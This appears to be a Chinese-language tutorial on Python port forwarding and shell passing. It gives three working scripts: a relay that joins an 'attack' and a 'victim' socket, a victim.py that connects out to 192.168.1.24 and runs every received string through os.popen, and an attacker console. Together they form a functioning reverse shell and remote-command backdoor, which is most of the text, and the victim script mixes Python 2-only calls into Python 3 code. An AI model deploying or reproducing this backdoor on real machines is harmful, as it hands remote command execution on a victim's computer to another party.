python写端口转发，和传递shell

相关知识

socket库搜别人的教程
os.popen()函数，贴出下面实例

# coding:utf-8 
import os
while True:
    dosf = input("输入命令>>")
    if dosf == "exit":
        break
    res = os.popen(dosf).read()
    print(res)

可以看到，input()得到一个命令str，然后用popen()方法得以执行，返回一个对象，对象的read()方法会返回命令str的执行结果。

原理图

文件源码

1.relay.py

from socket import *
l1 = socket(AF_INET,SOCK_STREAM)
l2 = socket(AF_INET,SOCK_STREAM)
addr1 = ('192.168.1.24',4000)
addr2 = ('192.168.1.24',4001)
l1.bind(addr1)
l2.bind(addr2)
l1.listen(1)
l2.listen(1)
s1,attack = l1.accept()
print(attack,"attk接入")
s2,victim = l2.accept()
print(victim,"vict接入")
while True:
    attk = s1.recv(1024)
    print("attk:",attk.decode())
    if attk == b"quit":
        l1.close()
        l2.close()
        s1.close()
        s2.close()
        break
    s2.send(attk)
    info = s2.recv(1024)
    print("vict:",info.decode())
    s1.send(info)

2.victim.py

from socket import *
import os
#下面三句是在linux下运行时要加上，否则可能报错
import sys
reload(sys)
sys.setdefaultencoding('utf8')
####

sock=socket(AF_INET, SOCK_STREAM)
sock.connect(('192.168.1.24',4001))
while True:
    data = sock.recv(1024)
    dosf = os.popen(data.decode())
    info = dosf.read()
    sock.send(info.encode())

3.attack.py

from socket import *

client=socket(AF_INET, SOCK_STREAM)
client.connect(('192.168.1.24',4000  ))
while True:                      
    data=input('Shell >>')
    client.send(data.encode())
    print('Execute:',data)
    if data=="quit":
        break
    data=client.recv(1024)
    print('Receive:',data.decode())